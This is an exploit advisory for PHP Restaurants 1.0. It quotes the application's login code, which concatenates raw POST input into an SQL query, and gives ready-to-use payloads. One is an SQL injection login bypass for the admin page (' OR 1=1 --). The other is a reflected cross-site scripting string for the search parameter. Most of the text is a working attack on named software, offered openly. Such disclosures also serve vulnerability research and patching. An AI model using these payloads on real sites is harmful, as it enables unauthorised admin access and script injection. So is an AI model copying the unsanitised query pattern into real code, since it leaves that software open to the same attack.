PHP Restaurants 1.0 SQL Injection / Cross Site Scripting

# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & CrossSite Scripting# Google Dork: None# Date: 4/26/2023# Exploit Author: Or4nG.M4n# Vendor Homepage: https://github.com/jcwebhole# Software Link: https://github.com/jcwebhole/php_restaurants# Version: 1.0functions.phpfunction login(){global $conn;$email = $_POST['email'];$pw = $_POST['password'];$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` ='".md5($pw)."'"; <-- there is No filter to secure sql queryparm[email][password]$result = $conn->query($sql);if ($result->num_rows > 0) {while($row = $result->fetch_assoc()) {setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 dayheader('location: index.php');}} else {header('location: login.php?m=Wrong Password');}}login bypass at admin page /rest1/admin/login.phpemail & password : ' OR 1=1 --             <- add [space] end of the payloadcross site scripting main page /index.phpxhttp.open("GET", "functions.php?f=getRestaurants<?php  if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here wecan insert our xss payload?>  ", true);xhttp.send();</script> <-- when you insert your'e payload don't forget to add </script>likexss payload : </script><img onerror=alert(1) src=a>